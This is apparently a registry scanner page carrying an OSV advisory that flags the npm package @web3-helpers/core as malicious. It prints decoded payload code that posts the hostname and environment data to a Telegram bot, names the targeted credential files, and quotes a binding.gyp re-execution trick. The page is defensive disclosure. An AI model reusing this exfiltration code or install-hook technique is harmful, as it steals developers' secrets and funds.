registry  /  @web3-helpers/core  /  1.0.0

@web3-helpers/core@1.0.0

OSV Malicious Advisory

scanned 3h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10611 confirms this npm version as malicious. At npm install time the preinstall script (dist/index.min.js) reads installer-owned secrets — ~/.ssh/id_rsa, ~/.env, ~/.env.local, ~/.wallet.json — and iterates process.env for keys matching PRIVATE_*, MNEMONIC*, and SECRET*. Extracted content is scanned for 64-hex and WIF private keys and posted, along with the installer's hostname and username, to https://api.telegram.org/bot<redacted>/sendMessage using a...

Advisory
MAL-2026-10611
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @web3-helpers/core (npm)
Details
At npm install time the preinstall script (dist/index.min.js) reads installer-owned secrets — ~/.ssh/id_rsa, ~/.env, ~/.env.local, ~/.wallet.json — and iterates process.env for keys matching PRIVATE_*, MNEMONIC*, and SECRET*. Extracted content is scanned for 64-hex and WIF private keys and posted, along with the installer's hostname and username, to https://api.telegram.org/bot<redacted>/sendMessage using a hardcoded bot token. The same payload uses ethers and bitcoinjs-lib to derive addresses from recovered keys, checks balances via cloudflare-eth.com and blockchain.info, and broadcasts signed transactions sweeping funds to hardcoded ETH_WALLET/BTC_WALLET recipient addresses (labeled 'PAYLOAD DRAIN - ETH & BTC' in a top-of-file comment). A binding.gyp file additionally uses GYP command expansion (`<!(node -e "require('./dist/index.min.js')...")`) to re-invoke the same payload whenever node-gyp configures the package, providing a second install-time execution channel. The package name mimics legitimate Web3 helper libraries, package.json declares the package as a dependency of itself, and no legitimate library code is present.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
Eval
Supply chain
HighEntropyStringsMinifiedTrivial
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 755 B of source

Source & flagged code

5 flagged · loading source
package.jsonView file
scripts.preinstall = node dist/index.min.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
dist/index.min.jsView file
1eval(Buffer.from('[redacted]...
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

dist/index.min.jsView on unpkg · L1
1eval(Buffer.from('[redacted]...
Low
Eval

Package source references a known benign dynamic code generation pattern.

dist/index.min.jsView on unpkg · L1
dist/index.min.js#virtual:base64:round1View file
2const detach = () => { L3: const { telegramBotToken, telegramChatId, ethWallet, solanaWallet, btcWallet } = process.env; L4: if (!telegramBotToken || !telegramChatId) return; L5: const axios = require('axios'); L6: axios.post(`https://api.telegram.org/bot${telegramBotToken}/sendMessage`, { L7: chat_id: telegramChatId, L8: text: `Hostname: ${require('os').hostname()}\nEnv: ${Object.keys(process.env).join(', ')}`, L9: parse_mode: 'HTML'
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

dist/index.min.js#virtual:base64:round1View on unpkg · L2
binding.gypView file
path = binding.gyp kind = build_helper sizeBytes = 154 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

binding.gypView on unpkg

Findings

3 High2 Medium3 Low
HighInstall Time Lifecycle Scriptspackage.json
HighSandbox Evasion Gated Capabilitydist/index.min.js#virtual:base64:round1
HighBase64 Obscured Urldist/index.min.js
MediumShips Build Helperbinding.gyp
MediumStructural Risk Force Deep Review
LowScripts Present
LowEvaldist/index.min.js
LowHigh Entropy Strings